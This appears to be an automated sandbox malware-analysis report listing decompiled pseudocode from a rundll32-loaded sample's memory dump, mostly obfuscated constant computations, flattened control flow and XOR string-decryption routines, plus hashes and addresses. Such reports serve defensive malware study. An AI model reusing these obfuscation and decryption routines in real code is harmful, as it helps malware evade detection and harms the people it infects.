                                                                                                                    0x003354e8
                                                                                                                    0x00000000
                                                                                                                    0x003354e8
                                                                                                                    0x003354b5
                                                                                                                    0x003354b7
                                                                                                                    0x00335532
                                                                                                                    0x00335538
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003354b9
                                                                                                                    0x003354d2
                                                                                                                    0x003354d4
                                                                                                                    0x003354d9
                                                                                                                    0x003354db
                                                                                                                    0x00000000
                                                                                                                    0x003354db
                                                                                                                    0x003354d9
                                                                                                                    0x003354b7
                                                                                                                    0x003354b3
                                                                                                                    0x003354ab
                                                                                                                    0x00335547
                                                                                                                    0x00335547
                                                                                                                    0x00335527
                                                                                                                    0x0033552d
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H2
                                                                                                                    • API String ID: 0-302591398
                                                                                                                    • Opcode ID: f3b1d75f0c4744326101b2b5548e9940fb0c2db1ee26c5dda9ec5a54711b03fb
                                                                                                                    • Instruction ID: 3551d5c65ea66a76a806127bf497559fd84c2153cdd79f9dc9ccddd575c3e422
                                                                                                                    • Opcode Fuzzy Hash: f3b1d75f0c4744326101b2b5548e9940fb0c2db1ee26c5dda9ec5a54711b03fb
                                                                                                                    • Instruction Fuzzy Hash: 1B41C0726083019FC729CF26E48641FBBE1FBD8758F144A1DF5865A220D7B0DA88CB83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00338B3D Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00338B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E0034D97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E0034D97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E00333DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}





















                                                                                                                    0x00338b44
                                                                                                                    0x00338b48
                                                                                                                    0x00338b4a
                                                                                                                    0x00338b4e
                                                                                                                    0x00338b52
                                                                                                                    0x00338b56
                                                                                                                    0x00338b57
                                                                                                                    0x00338b58
                                                                                                                    0x00338b5d
                                                                                                                    0x00338b65
                                                                                                                    0x00338b68
                                                                                                                    0x00338b6f
                                                                                                                    0x00338b77
                                                                                                                    0x00338b79
                                                                                                                    0x00338b81
                                                                                                                    0x00338b86
                                                                                                                    0x00338b93
                                                                                                                    0x00338b9b
                                                                                                                    0x00338ba3
                                                                                                                    0x00338bab
                                                                                                                    0x00338bb3
                                                                                                                    0x00338bbb
                                                                                                                    0x00338bc3
                                                                                                                    0x00338bc8
                                                                                                                    0x00338bd0
                                                                                                                    0x00338bd8
                                                                                                                    0x00338be0
                                                                                                                    0x00338be8
                                                                                                                    0x00338bf0
                                                                                                                    0x00338bf8
                                                                                                                    0x00338bfd
                                                                                                                    0x00338c05
                                                                                                                    0x00338c0d
                                                                                                                    0x00338c15
                                                                                                                    0x00338c1d
                                                                                                                    0x00338c25
                                                                                                                    0x00338c2d
                                                                                                                    0x00338c35
                                                                                                                    0x00338c3a
                                                                                                                    0x00338c42
                                                                                                                    0x00338c4a
                                                                                                                    0x00338c52
                                                                                                                    0x00338c5d
                                                                                                                    0x00338c65
                                                                                                                    0x00338c69
                                                                                                                    0x00338c6e
                                                                                                                    0x00338c76
                                                                                                                    0x00338c76
                                                                                                                    0x00338c80
                                                                                                                    0x00338ce0
                                                                                                                    0x00000000
                                                                                                                    0x00338c82
                                                                                                                    0x00338c88
                                                                                                                    0x00338cd0
                                                                                                                    0x00338cd5
                                                                                                                    0x00338cd8
                                                                                                                    0x00338cda
                                                                                                                    0x00338cdc
                                                                                                                    0x00000000
                                                                                                                    0x00338cdc
                                                                                                                    0x00338c8a
                                                                                                                    0x00338c8a
                                                                                                                    0x00338c8c
                                                                                                                    0x00000000
                                                                                                                    0x00338c8e
                                                                                                                    0x00338ca2
                                                                                                                    0x00338caf
                                                                                                                    0x00338caf
                                                                                                                    0x00338c8c
                                                                                                                    0x00338c88
                                                                                                                    0x00338cb3
                                                                                                                    0x00338cbb
                                                                                                                    0x00338cbb
                                                                                                                    0x00338cf8
                                                                                                                    0x00338cfd
                                                                                                                    0x00338d00
                                                                                                                    0x00338d05
                                                                                                                    0x00338d05
                                                                                                                    0x00338d05
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 7RX
                                                                                                                    • API String ID: 0-861457431
                                                                                                                    • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                    • Instruction ID: 4be2aad4aecbbd3f6732231332ee29ecdca16cd3c0e3b65c48136b14a944ce04
                                                                                                                    • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                    • Instruction Fuzzy Hash: CF4155B1109701DBCB968F21848982FBBE1FFC4B88F501A2DF59696220D7718A598F97
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00347BA6 Relevance: 1.3, Strings: 1, Instructions: 97COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00347BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E00337FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}
























                                                                                                                    0x00347bac
                                                                                                                    0x00347bb0
                                                                                                                    0x00347bb3
                                                                                                                    0x00347bb4
                                                                                                                    0x00347bb8
                                                                                                                    0x00347bb9
                                                                                                                    0x00347bba
                                                                                                                    0x00347bbf
                                                                                                                    0x00347bc7
                                                                                                                    0x00347bc9
                                                                                                                    0x00347bd3
                                                                                                                    0x00347bd7
                                                                                                                    0x00347bdf
                                                                                                                    0x00347be4
                                                                                                                    0x00347bec
                                                                                                                    0x00347bf4
                                                                                                                    0x00347c03
                                                                                                                    0x00347c06
                                                                                                                    0x00347c0a
                                                                                                                    0x00347c12
                                                                                                                    0x00347c1a
                                                                                                                    0x00347c22
                                                                                                                    0x00347c32
                                                                                                                    0x00347c36
                                                                                                                    0x00347c3f
                                                                                                                    0x00347c42
                                                                                                                    0x00347c46
                                                                                                                    0x00347c4e
                                                                                                                    0x00347c53
                                                                                                                    0x00347c56
                                                                                                                    0x00347c58
                                                                                                                    0x00347c5e
                                                                                                                    0x00347c6f
                                                                                                                    0x00347c83
                                                                                                                    0x00347c88
                                                                                                                    0x00347c90
                                                                                                                    0x00347ca6
                                                                                                                    0x00347cab
                                                                                                                    0x00347cad
                                                                                                                    0x00347cb3
                                                                                                                    0x00347cb5
                                                                                                                    0x00347cb9
                                                                                                                    0x00347cba
                                                                                                                    0x00347cbd
                                                                                                                    0x00347cc0
                                                                                                                    0x00347cc4
                                                                                                                    0x00347cc4
                                                                                                                    0x00347cca
                                                                                                                    0x00347cd0
                                                                                                                    0x00000000
                                                                                                                    0x00347cd0
                                                                                                                    0x00347cca
                                                                                                                    0x00347cda

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ]0
                                                                                                                    • API String ID: 0-3096761382
                                                                                                                    • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                    • Instruction ID: 6b0cdc4e53d5e04f3971ad0143b6a3ac5fb01def471c097bf100de2e935669fb
                                                                                                                    • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                    • Instruction Fuzzy Hash: 743175726093008FD318CF29C88594BFBE6FBC9708F508A2EF58997251DBB5ED058B56
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00333C3C Relevance: 1.3, Strings: 1, Instructions: 94COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00333C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E0033A918(_a4, _v40, _v36, _v8, E0034DCF7(_v32, 0x3317c0, _v40), _v12,  &_v564);
				E0033A8B0(_v24, _t107, _v16);
				return E00341F8A(_v20, _v40,  &_v564);
			}


















                                                                                                                    0x00333c46
                                                                                                                    0x00333c49
                                                                                                                    0x00333c4c
                                                                                                                    0x00333c4f
                                                                                                                    0x00333c50
                                                                                                                    0x00333c51
                                                                                                                    0x00333c56
                                                                                                                    0x00333c5f
                                                                                                                    0x00333c66
                                                                                                                    0x00333c6d
                                                                                                                    0x00333c79
                                                                                                                    0x00333c7e
                                                                                                                    0x00333c87
                                                                                                                    0x00333c8a
                                                                                                                    0x00333c8d
                                                                                                                    0x00333c94
                                                                                                                    0x00333c9b
                                                                                                                    0x00333ca2
                                                                                                                    0x00333ca9
                                                                                                                    0x00333cb5
                                                                                                                    0x00333cb6
                                                                                                                    0x00333cbb
                                                                                                                    0x00333cc2
                                                                                                                    0x00333cc9
                                                                                                                    0x00333ccd
                                                                                                                    0x00333cd8
                                                                                                                    0x00333cdb
                                                                                                                    0x00333ce2
                                                                                                                    0x00333ce9
                                                                                                                    0x00333ced
                                                                                                                    0x00333cf4
                                                                                                                    0x00333cf8
                                                                                                                    0x00333cff
                                                                                                                    0x00333d06
                                                                                                                    0x00333d0d
                                                                                                                    0x00333d14
                                                                                                                    0x00333d1b
                                                                                                                    0x00333d2c
                                                                                                                    0x00333d2f
                                                                                                                    0x00333d33
                                                                                                                    0x00333d37
                                                                                                                    0x00333d3e
                                                                                                                    0x00333d45
                                                                                                                    0x00333d4c
                                                                                                                    0x00333d53
                                                                                                                    0x00333d5a
                                                                                                                    0x00333d61
                                                                                                                    0x00333d65
                                                                                                                    0x00333d6c
                                                                                                                    0x00333d6f
                                                                                                                    0x00333d90
                                                                                                                    0x00333d9d
                                                                                                                    0x00333dbb

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a3}
                                                                                                                    • API String ID: 0-1821053108
                                                                                                                    • Opcode ID: f0e164c7d3d3718b305136b2b461c08cb3ee3854ff0f50365b9f548e75653f48
                                                                                                                    • Instruction ID: 5f1faa5e7f7a3088cfb3703ab4aabd04a31e99062aedbb9b4bcc4d9845ba1ce6
                                                                                                                    • Opcode Fuzzy Hash: f0e164c7d3d3718b305136b2b461c08cb3ee3854ff0f50365b9f548e75653f48
                                                                                                                    • Instruction Fuzzy Hash: 4D41F271D0020AEBCF09CFE0D94A5EEBBB2FB44314F208199E510BA260D7B55B55DFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00348606 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00348606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E003420B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E00337FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}



















                                                                                                                    0x0034860c
                                                                                                                    0x00348610
                                                                                                                    0x00348614
                                                                                                                    0x00348618
                                                                                                                    0x0034861a
                                                                                                                    0x0034861f
                                                                                                                    0x00348627
                                                                                                                    0x0034862a
                                                                                                                    0x00348632
                                                                                                                    0x00348637
                                                                                                                    0x0034863f
                                                                                                                    0x00348647
                                                                                                                    0x0034864f
                                                                                                                    0x00348659
                                                                                                                    0x0034865d
                                                                                                                    0x00348665
                                                                                                                    0x0034866d
                                                                                                                    0x00348675
                                                                                                                    0x0034867a
                                                                                                                    0x00348682
                                                                                                                    0x00348686
                                                                                                                    0x00348689
                                                                                                                    0x0034868b
                                                                                                                    0x0034868f
                                                                                                                    0x00348693
                                                                                                                    0x003486a3
                                                                                                                    0x003486ae
                                                                                                                    0x003486bc
                                                                                                                    0x003486be
                                                                                                                    0x003486c6
                                                                                                                    0x003486ce
                                                                                                                    0x003486d0
                                                                                                                    0x003486e1
                                                                                                                    0x003486e6
                                                                                                                    0x003486e8
                                                                                                                    0x003486ec
                                                                                                                    0x003486ec
                                                                                                                    0x003486ee
                                                                                                                    0x003486f1
                                                                                                                    0x003486f3
                                                                                                                    0x003486fa
                                                                                                                    0x003486fd
                                                                                                                    0x00348700
                                                                                                                    0x00348703
                                                                                                                    0x00348709
                                                                                                                    0x0034870a
                                                                                                                    0x0034870d
                                                                                                                    0x00348711
                                                                                                                    0x00348711
                                                                                                                    0x0034871a
                                                                                                                    0x0034871a
                                                                                                                    0x00348726

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: &#
                                                                                                                    • API String ID: 0-2240308938
                                                                                                                    • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                    • Instruction ID: c71dff247012136b8ff4c60dcdc8ceae2ffd20a21566f3c76537882e8365d435
                                                                                                                    • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                    • Instruction Fuzzy Hash: 92316C726083518FC305DF28C48581BFBE0FF98718F054B6DE889AB211D774EA09CB96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034DCF7 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E0034DCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E003420B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E00337FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}



















                                                                                                                    0x0034dcfd
                                                                                                                    0x0034dd01
                                                                                                                    0x0034dd05
                                                                                                                    0x0034dd07
                                                                                                                    0x0034dd0c
                                                                                                                    0x0034dd14
                                                                                                                    0x0034dd1c
                                                                                                                    0x0034dd20
                                                                                                                    0x0034dd28
                                                                                                                    0x0034dd30
                                                                                                                    0x0034dd38
                                                                                                                    0x0034dd40
                                                                                                                    0x0034dd48
                                                                                                                    0x0034dd50
                                                                                                                    0x0034dd58
                                                                                                                    0x0034dd5c
                                                                                                                    0x0034dd5f
                                                                                                                    0x0034dd61
                                                                                                                    0x0034dd65
                                                                                                                    0x0034dd69
                                                                                                                    0x0034dd79
                                                                                                                    0x0034dd84
                                                                                                                    0x0034dd93
                                                                                                                    0x0034dd95
                                                                                                                    0x0034dd9d
                                                                                                                    0x0034dda5
                                                                                                                    0x0034dda7
                                                                                                                    0x0034ddb8
                                                                                                                    0x0034ddbd
                                                                                                                    0x0034ddbf
                                                                                                                    0x0034ddc3
                                                                                                                    0x0034ddc3
                                                                                                                    0x0034ddc5
                                                                                                                    0x0034ddc8
                                                                                                                    0x0034ddcd
                                                                                                                    0x0034ddd5
                                                                                                                    0x0034dddb
                                                                                                                    0x0034dddf
                                                                                                                    0x0034dde8
                                                                                                                    0x0034dde9
                                                                                                                    0x0034ddf0
                                                                                                                    0x0034ddf4
                                                                                                                    0x0034ddf8
                                                                                                                    0x0034ddf8
                                                                                                                    0x0034de03
                                                                                                                    0x0034de03
                                                                                                                    0x0034de0f

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
